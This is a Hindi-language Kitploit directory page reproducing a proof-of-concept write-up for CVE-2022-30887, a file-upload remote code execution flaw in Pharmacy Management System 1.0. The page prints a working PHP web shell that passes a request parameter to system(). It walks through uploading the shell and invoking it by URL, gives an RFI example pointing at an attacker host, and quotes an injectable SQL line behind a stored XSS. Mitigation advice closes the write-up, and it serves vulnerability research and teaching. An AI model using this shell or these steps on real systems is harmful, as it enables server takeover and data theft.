Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30887 — CVE-2022-30887 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फार्मेसी प्रबंधन प्रणाली 1.0 में फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन प्रदर्शित करता है, शमन मार्गदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/sonerctnkya/cve-2022-30887
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubsonerctnkya/cve-2022-30887

CVE-2022-30887

CVE-2022-30887 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फार्मेसी प्रबंधन प्रणाली 1.0 में फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन प्रदर्शित करता है, शमन मार्गदर्शन के साथ।

रिपॉजिटरी देखें
2454 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30887

Pharmacy Management System 1.0 शेल अपलोड

यह एप्लिकेशन Mayurik द्वारा बनाया गया है PHP में फार्मेसी प्रबंधन प्रणाली परियोजना को सुरक्षा और प्रबंधन के माध्यम से फार्मास्युटिकल स्टोरों की सटीकता और दक्षता में सुधार के लिए विकसित किया गया है। संक्षेप में, यह एक उत्पाद इन्वेंट्री एप्लिकेशन है।

Pharmacy Management System v1.0 में घटक "/php_action/editProductImage.php" के माध्यम से एक रिमोट कोड निष्पादन (RCE) कमजोरी पाई गई थी। यह कमजोरी हमलावरों को एक तैयार की गई इमेज फ़ाइल के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

फ़ाइल इन्क्लूज़न अटैक क्या है

फ़ाइल अपलोड कमजोरियाँ आमतौर पर एक ऐसी कमजोरी होती हैं जो एक स्क्रिप्ट को चलाने की अनुमति देती है। यह तब काम करती है जब हम फ़ाइल को सर्वर पर अपलोड करते हैं और अपलोड की गई फ़ाइल पर एक कमांड दर्ज करते हैं। फ़ाइल अपलोड कमजोरियाँ दो प्रकार की होती हैं;

  • LFI (लोकल फ़ाइल इन्क्लूज़न)
  • RFI (रिमोट फ़ाइल इन्क्लूज़न)

LFI (लोकल फ़ाइल इन्क्लूज़न)

यह कमजोरी तब होती है जब सर्वर पर मौजूद लोकल फ़ाइलें उपयोगकर्ता से प्राप्त फ़ाइल को शामिल करती हैं। उपयोगकर्ता से प्राप्त मानों को सैनिटाइज़ किया जाना चाहिए।

LFI (लोकल फ़ाइल इन्क्लूज़न) का उदाहरण;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>

RFI (रिमोट फ़ाइल इन्क्लूज़न)

यह कमजोरी तब काम करती है जब हमलावर किसी रिमोट सर्वर से मैलवेयर अपलोड करता है।

RFI (रिमोट फ़ाइल इन्क्लूज़न) का उदाहरण;

"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

एक्सप्लॉइट, PoC की व्याख्या

  • सबसे पहले, लॉगिन पेज के बाद हम "dashboar.php" पर जाएंगे
  • दूसरे, उस पेज पर जाने के लिए जहां कमजोरी पाई गई थी, मेन्यू में मेडिसिन पर क्लिक करें फिर मैनेज मेडिसिन पर क्लिक करने के बाद आप "product.php" पर जाएंगे और एक्शन टैब के तहत एडिट इमेज पर क्लिक करें

उत्पाद

  • "editproduct.php" पेज पर, सेलेक्ट फोटो बटन पर क्लिक करें और अपनी शेल स्क्रिप्ट अपलोड करें।

php शेल स्क्रिप्ट का उदाहरण;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>
  • सेव बटन पर क्लिक करें और बर्प सूट पर रिक्वेस्ट कैप्चर करें

रिक्वेस्ट;

अनुरोध

रेस्पॉन्स;

प्रतिक्रिया

  • फ़ाइल "/assets/myimage/" फ़ोल्डर में डाउनलोड हुई
  • अपनी स्क्रिप्ट चलाने के लिए URL में अनुरोध करें जो है /assets/myimage/shell.php?s=echo+%22MuallimNaci%22

रिक्वेस्ट;

अनुरोध

रेस्पॉन्स;

प्रतिक्रिया

प्रतिक्रिया

  • और बूम

साथ ही यह कमजोरी एप्लिकेशन पर अभी भी सक्रिय है।

शमन

  • सुनिश्चित करें कि आप केवल "a-Z0-9" जैसे वर्णों को स्वीकार करते हैं और ".." या "/" या "%00" (नल बाइट) की अनुमति न दें
  • सुनिश्चित करें कि "allow_url_include flag" बंद हो
  • owasp 10 रेमेडिएशन के अनुसार; "एप्लिकेशन उन फ़ाइलों की एक श्वेत सूची बनाए रख सकता है, जिन्हें पेज द्वारा शामिल किया जा सकता है, और फिर चयनित फ़ाइल तक पहुँचने के लिए एक पहचानकर्ता (उदाहरण के लिए इंडेक्स नंबर) का उपयोग करें। अमान्य पहचानकर्ता वाले किसी भी अनुरोध को अस्वीकार कर दिया जाना चाहिए, इस प्रकार दुर्भावनापूर्ण उपयोगकर्ताओं के लिए पथ में हेरफेर करने का कोई हमला सतह नहीं होगी"

अतिरिक्त

उसी पेज "editproduct.php" पर, मुझे स्टोर्ड XSS मिला

  • वह कोड जिसमें कमजोरी शामिल है;
root@kitploit:~
$sql = "UPDATE product SET product_name = '$productName'"

इस कोड ब्लॉक में आप डबल कोट्स (") के साथ संदर्भ से बाहर जा सकते हैं

रिक्वेस्ट;

अनुरोध

रेस्पॉन्स;

प्रतिक्रिया

प्रतिक्रिया

निष्कर्ष

मुझे उम्मीद है कि मैं बता पाया हूँ कि फ़ाइल इन्क्लूज़न कमजोरी कैसे काम करती है, कौन सी या किस स्थिति में यह कमजोरी ट्रिगर होती है और हमलावरों से इस हमले को कैसे रोका जाए। आपके बहुमूल्य समय के लिए धन्यवाद।

टूल डाउनलोड करें